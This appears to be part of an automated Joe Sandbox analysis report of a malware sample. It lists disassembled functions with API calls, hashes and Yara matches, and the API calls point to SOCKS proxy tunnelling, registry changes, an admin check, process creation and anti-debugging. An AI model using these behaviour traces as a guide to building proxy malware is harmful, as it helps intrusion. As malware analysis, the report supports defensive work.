                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 784aae72a8d0e22eada184e7472d4f8b400a7a614b30234601793755bb2d2643
                                                                          • Instruction ID: 1344dba02c9feb4f28b276943496abacd021c57279e7d427bf65e8cbe5553865
                                                                          • Opcode Fuzzy Hash: 784aae72a8d0e22eada184e7472d4f8b400a7a614b30234601793755bb2d2643
                                                                          • Instruction Fuzzy Hash: A5519470A00208AFDF14DF58CD85AAD7BB6EF49324F24815AF81A9B352DB75DE41CB90
                                                                          Function 00AC9E20 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00AC9F7B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Concurrency::cancel_current_task
                                                                          • String ID:
                                                                          • API String ID: 118556049-0
                                                                          • Opcode ID: 3eb695c978725a0c60fb8b73cb53e1a71b4e2acccc64f511a3fdeabadfd0addd
                                                                          • Instruction ID: ace9bac1f38b4b4e4e12b53d4fffd6af04df5480bd7121bcca6a07a9617276ea
                                                                          • Opcode Fuzzy Hash: 3eb695c978725a0c60fb8b73cb53e1a71b4e2acccc64f511a3fdeabadfd0addd
                                                                          • Instruction Fuzzy Hash: BE41E472E002159FCB14DF68C945AAFBBB9EB99310F25426EE815E7381D730DE018BE1
                                                                          Function 00B875C0 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __fread_nolock
                                                                          • String ID:
                                                                          • API String ID: 2638373210-0
                                                                          • Opcode ID: fc00445663a72cd0befcc7d55a743e25036e0a8b64e9e39765f93badc4153096
                                                                          • Instruction ID: c0579cec78c20e8c5b0638746fb937af6bb65df3994c59ce4f99f30878c5ea44
                                                                          • Opcode Fuzzy Hash: fc00445663a72cd0befcc7d55a743e25036e0a8b64e9e39765f93badc4153096
                                                                          • Instruction Fuzzy Hash: 14515AB4D043499BDB10DF98D982BAEFBF4EF44704F20025AE8416B391D775AA44CBA2
                                                                          Function 00B87440 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __fread_nolock
                                                                          • String ID:
                                                                          • API String ID: 2638373210-0
                                                                          • Opcode ID: 14cc283d9a127f19178085ba392e3cb1be062286124526376e3fcffaab9deac1
                                                                          • Instruction ID: b19751b706f9a361a500bd1a6387e1a930ebb1cffbbe6d1d9023cc3a7206336b
                                                                          • Opcode Fuzzy Hash: 14cc283d9a127f19178085ba392e3cb1be062286124526376e3fcffaab9deac1
                                                                          • Instruction Fuzzy Hash: A0414CB0D04208DBCB04EF98D981BEEBBB4FF58704F104159E815AB392D775A901CBA1
                                                                          Function 06260218 Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3215871519.0000000006260000.00000040.00001000.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6260000_file.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 7fbea16f81ed2aaef5533adc727d577db3c2b969191867bbe4d4b3cd898a283c
                                                                          • Instruction ID: f219b0564505be02b158ec911edc797a4f9f19e444affd5af1c2ca7462008b1d
                                                                          • Opcode Fuzzy Hash: 7fbea16f81ed2aaef5533adc727d577db3c2b969191867bbe4d4b3cd898a283c
                                                                          • Instruction Fuzzy Hash: 65418E76B202069FDB54CF5AC980E69B7A5FF85314B288269EC089B741D770ECA1DB90
                                                                          Function 00B65F80 Relevance: 1.6, APIs: 1, Instructions: 311COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,75923100,00000010,00000000), ref: 00B663CD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 1b049416209b9fd41cc61294730efa094ad23388d766c04e433d9a00daa70f99
                                                                          • Instruction ID: 404a40fae2297cbebea05ee82667dba9058e36550ed2c9d13f7d7c3da52191af
                                                                          • Opcode Fuzzy Hash: 1b049416209b9fd41cc61294730efa094ad23388d766c04e433d9a00daa70f99
                                                                          • Instruction Fuzzy Hash: 32D169B0C043588FDB24CF98C9957EEBBF1EF15314F148299D449AB382D7796A84CB51
                                                                          Function 06B79970 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetupDiGetClassDevsA.SETUPAPI(06BD9500,00000000,00000000,00000012), ref: 06B799A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ClassDevsSetup
                                                                          • String ID:
                                                                          • API String ID: 2330331845-0
                                                                          • Opcode ID: a44dfe1d843b5a237434953e0270ef61090e745f54d1ef7769f73a3dec004fee
                                                                          • Instruction ID: ea81493688bd05be8a9c2737588ef8bf2d47a7d6775a517229a284c510ceb9a2
                                                                          • Opcode Fuzzy Hash: a44dfe1d843b5a237434953e0270ef61090e745f54d1ef7769f73a3dec004fee
                                                                          • Instruction Fuzzy Hash: 5C11CCB0D00208EFDB54DF98D995B9EBBB0FF48314F108199E515AB380D775AA40DF94
                                                                          Function 06B7D3F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(06B9CA21,00000001,06BEA924,00000000), ref: 06B7D41D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DescriptorSecurity$ConvertString
                                                                          • String ID:
                                                                          • API String ID: 3907675253-0
                                                                          • Opcode ID: 3906aea161ade2b15fde453d02203427bdaf2b36fc9a3e41fbaf7076bd78aaeb
                                                                          • Instruction ID: ff0e930e3b298747cd5463310813b3c39195ee39bd25d0838c111b77f9c9fec0
                                                                          • Opcode Fuzzy Hash: 3906aea161ade2b15fde453d02203427bdaf2b36fc9a3e41fbaf7076bd78aaeb
                                                                          • Instruction Fuzzy Hash: 34E075B4601208EBEB00CF44D845B997BB9EB48758F108188FD089B381D6B6AE408B94
                                                                          Function 06B82470 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • setsockopt.WS2_32(00000AD4,0000FFFF,00001006,00000AD4,00000008), ref: 06B824A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: setsockopt
                                                                          • String ID:
                                                                          • API String ID: 3981526788-0
                                                                          • Opcode ID: 4a13a3682ea6c0811f271151c4c2fdc9b08331260999a1ba699b62c9d435217a
                                                                          • Instruction ID: 39670d58eecb022631dd4606b5ec6b21e742cbb4e5d5f2b57fb80d11f37da382
                                                                          • Opcode Fuzzy Hash: 4a13a3682ea6c0811f271151c4c2fdc9b08331260999a1ba699b62c9d435217a
                                                                          • Instruction Fuzzy Hash: 00E04870D40308BFDB54DF94D845BDC7BB8AB48700F10C169F9089B2C0E6705744CB40
                                                                          Function 00AE9789 Relevance: 1.4, APIs: 1, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,?,00B86DBC,?,00ADCFE7,00B86DBC,?,00C19E10,00000010), ref: 00AE9918
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 03953db6b597a262980253a49025331602215a8d1e8802e3dc145772c610a6e9
                                                                          • Instruction ID: fc6d486130b2a743fa359d6333d657ea20d1ba697bd690d8211d737a4998c360
                                                                          • Opcode Fuzzy Hash: 03953db6b597a262980253a49025331602215a8d1e8802e3dc145772c610a6e9
                                                                          • Instruction Fuzzy Hash: BB61C4B1D04299AFDF11DFAACD84AEF7BB9AF09304F140149E904A7266D731D905CBA1
                                                                          Function 00AEB01A Relevance: 1.3, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00ABABA8,00ABABA8,00000000,?,E5A31934,00AF6991,?,CE1CD6A7,00C8523A,?,00C97403,E186E883,00CDB66A,00C2EE18,?,00D51CF6), ref: 00AEB03B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                          • Associated: 00000000.00000002.3214686212.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214820584.0000000000C25000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214834944.0000000000C2A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214903550.0000000000D56000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3214917043.0000000000D57000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_aa0000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 37a1558459619014c878a35fa9237e0abd86daa4f2459362f531eb6e92690d4a
                                                                          • Instruction ID: 29d27261f028628ce01a20ba2f19e92b66ed389cdd5438ed3ec89005b2fc54e5
                                                                          • Opcode Fuzzy Hash: 37a1558459619014c878a35fa9237e0abd86daa4f2459362f531eb6e92690d4a
                                                                          • Instruction Fuzzy Hash: 06E08C32101264A6CB313BE6AC09F9A3B6AAF04351F444068FA089A5A0CB749891C7A8

                                                                          Non-executed Functions

                                                                          Function 06B972F0 Relevance: 53.9, APIs: 22, Strings: 8, Instructions: 1363threadnetworkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B97345
                                                                          • _memcpy_s.LIBCPMTD ref: 06B977ED
                                                                          • _memcpy_s.LIBCPMTD ref: 06B97807
                                                                          • inet_ntop.WS2_32(00000002,?,00000000,00000016), ref: 06B97835
                                                                          • htons.WS2_32(?), ref: 06B97850
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B9785F
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B97C64
                                                                          • _memcpy_s.LIBCPMTD ref: 06B97D13
                                                                          • getaddrinfo.WS2_32(?,06BE11A8,00000001,00000000), ref: 06B97D35
                                                                          • WSAGetLastError.WS2_32 ref: 06B97D55
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B97D61
                                                                          • _memcpy_s.LIBCPMTD ref: 06B981FF
                                                                          • _memcpy_s.LIBCPMTD ref: 06B98229
                                                                          • inet_ntop.WS2_32(00000002,?,00000000,00000016), ref: 06B98257
                                                                          • htons.WS2_32(?), ref: 06B98272
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B98281
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B98674
                                                                          • _memcpy_s.LIBCPMTD ref: 06B98B19
                                                                          • _memcpy_s.LIBCPMTD ref: 06B98B33
                                                                          • inet_ntop.WS2_32(00000017,?,00000000,00000041), ref: 06B98B61
                                                                          • htons.WS2_32(?), ref: 06B98B7C
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06B98B8B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentThread_memcpy_s$htonsinet_ntop$ErrorLastgetaddrinfo
                                                                          • String ID: -$[-] SOCKS thread(%d) getAddressInfo DNS selected, length mismatch: %ld$uFSV$uFSV$uFSV$uFSV$uFSV$uFSV
                                                                          • API String ID: 1609131275-272974455
                                                                          • Opcode ID: c362e82e212739bb033a0968b0abae12fc26bbcde9fc96e7180a7121d89e45a4
                                                                          • Instruction ID: c2e3c9294331aaefa44286dbd73167e250cb02c4513f8aad671e79e3dd74b503
                                                                          • Opcode Fuzzy Hash: c362e82e212739bb033a0968b0abae12fc26bbcde9fc96e7180a7121d89e45a4
                                                                          • Instruction Fuzzy Hash: 9E03E1B0D056A88BDB668F28C881BD9FBB1BF98304F1492D9D94DA7211EB315BC5CF44
                                                                          Function 06B7C760 Relevance: 33.9, APIs: 14, Strings: 5, Instructions: 644registryprocessstringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 06B7CD2B
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 06B7CD7E
                                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000002,00000004), ref: 06B7CDAA
                                                                          • GetSystemWindowsDirectoryA.KERNEL32(?,00000200), ref: 06B7CE04
                                                                          • lstrcatA.KERNEL32(?,?,?,?,?), ref: 06B7CF17
                                                                          • IsUserAnAdmin.SHELL32 ref: 06B7CF88
                                                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 06B7D1CE
                                                                          • CloseHandle.KERNEL32(?), ref: 06B7D1F7
                                                                          • CloseHandle.KERNEL32(?), ref: 06B7D204
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseHandleValue$AdminCreateDirectoryOpenProcessQuerySystemUserWindowslstrcat
                                                                          • String ID: DhbZ$HjDBKYOik35wJkl$JVDo$Jfbx$Qhbx
                                                                          • API String ID: 829427948-3866227311
                                                                          • Opcode ID: 525de571d5eeb09c01f3df9fb6f04b7f6f9385fc0c4fd0df863a9a06a88ca201
                                                                          • Instruction ID: 9a7a0fa14902605dd7fd09f505f3def9fde7a8bf3987f41b7e62e7aa33535957
                                                                          • Opcode Fuzzy Hash: 525de571d5eeb09c01f3df9fb6f04b7f6f9385fc0c4fd0df863a9a06a88ca201
                                                                          • Instruction Fuzzy Hash: 1682F0B4D052A88BDB66CF68C894BEDBBB1AF59304F1081D9D98CB7251EB305AC5CF50
                                                                          Function 06B7B2C0 Relevance: 18.5, APIs: 12, Instructions: 478fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 06B7B4E0
                                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 06B7B69B
                                                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 06B7B95D
                                                                          • FindClose.KERNEL32(000000FF), ref: 06B7B970
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 06B7B976
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseCreateDirectoryErrorFirstLastNext
                                                                          • String ID:
                                                                          • API String ID: 2993551283-0
                                                                          • Opcode ID: aad5c678db3015b6d20dec97e0269f1398e0127960c9c815be4ba4ff2a2bafc0
                                                                          • Instruction ID: 1385d7089142622cc74f11c616b3bf82d9eea97172e936102dd350898916e624
                                                                          • Opcode Fuzzy Hash: aad5c678db3015b6d20dec97e0269f1398e0127960c9c815be4ba4ff2a2bafc0
                                                                          • Instruction Fuzzy Hash: FF324AB0C14258CBDBA5EFA4CC90BEDBBB4AF15300F5481E9D459A7291EB305B89CF61
                                                                          Function 06B824B0 Relevance: 11.8, APIs: 4, Strings: 2, Instructions: 1252libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __aulldiv.LIBCMT ref: 06B834DB
                                                                          • __aulldiv.LIBCMT ref: 06B83765
                                                                          • GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,00000000,00006C23,00000000), ref: 06B83A71
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 06B83A8B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __aulldiv$AddressHandleModuleProc
                                                                          • String ID: Ws2_32.dll$y
                                                                          • API String ID: 3748425447-3152010109
                                                                          • Opcode ID: 20e68f12b82ae5ef3fed564b98df3e54541b0a7bbe7a36583bbb4ac7834716c4
                                                                          • Instruction ID: 4ce79f6b15e3bdb47f4423121a1666bca8134fa097b693fd7cd930e66de9e781
                                                                          • Opcode Fuzzy Hash: 20e68f12b82ae5ef3fed564b98df3e54541b0a7bbe7a36583bbb4ac7834716c4
                                                                          • Instruction Fuzzy Hash: 26E2BCB4E052698FDB69CF58C894BEEBBB1AF49304F1081DAD859A7351D7309E81CF90
                                                                          Function 06BD1714 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __floor_pentium4
                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                          • API String ID: 4168288129-2761157908
                                                                          • Opcode ID: 7e2f2e0e3e8eda1aeaca0c56ed2d6d525c42542576fbb39abf17b69224f67543
                                                                          • Instruction ID: 6d8f10fa4f1c60c0029baaea24384c32aa889e45d33cd0b628ef038a8dc83123
                                                                          • Opcode Fuzzy Hash: 7e2f2e0e3e8eda1aeaca0c56ed2d6d525c42542576fbb39abf17b69224f67543
                                                                          • Instruction Fuzzy Hash: ABD24BB1E086688FDBA5CE28CD407EAB7B5EB44315F1451EAD50DEB240E774AE85CF80
                                                                          Function 06B7C480 Relevance: 7.7, APIs: 5, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateLevelSafer
                                                                          • String ID:
                                                                          • API String ID: 3489925794-0
                                                                          • Opcode ID: 7edd8c3f697e91a3b16db3f6f0eaab29097d12a538aa7b52aad93a7449ae396a
                                                                          • Instruction ID: 01add1ba1ff7b08133912a4e395f9fa08351ec51ebbbad2260ae3a102eac4a94
                                                                          • Opcode Fuzzy Hash: 7edd8c3f697e91a3b16db3f6f0eaab29097d12a538aa7b52aad93a7449ae396a
                                                                          • Instruction Fuzzy Hash: 1CA104B4D05248DFDF54CFA4D890BEEBFB5AF09300F108199E569AB280DB749A45CFA0
                                                                          Function 06BD02FD Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 06BC47E3: GetLastError.KERNEL32(00000000,06BBFE22,06BCA074), ref: 06BC47E7
                                                                            • Part of subcall function 06BC47E3: SetLastError.KERNEL32(00000000,00000000,00000000,0000000A,000000FF), ref: 06BC4889
                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 06BD0405
                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 06BD0443
                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 06BD0456
                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 06BD049E
                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 06BD04B9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                          • String ID:
                                                                          • API String ID: 415426439-0
                                                                          • Opcode ID: 1c0cd00e55b80af08c111f109d3444821ea468750be8ddd20b1e22cf10c8fd02
                                                                          • Instruction ID: bbdbf1317b9b6a31ab6b171baabd8c3d9f31e0b2595148105825035d9394d7f8
                                                                          • Opcode Fuzzy Hash: 1c0cd00e55b80af08c111f109d3444821ea468750be8ddd20b1e22cf10c8fd02
                                                                          • Instruction Fuzzy Hash: B75153B1E00219AFEBA0EFA5DC44EBE77B9EF18710F0445A9A915EF150F7B09604CB61
                                                                          Function 06BAE580 Relevance: 4.7, APIs: 3, Instructions: 200threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 06BAE679
                                                                          • IsDebuggerPresent.KERNEL32 ref: 06BAE758
                                                                          • OutputDebugStringW.KERNEL32(?), ref: 06BAE7BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06B70000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_6b70000_file.jbxd
                                                                          Yara matches
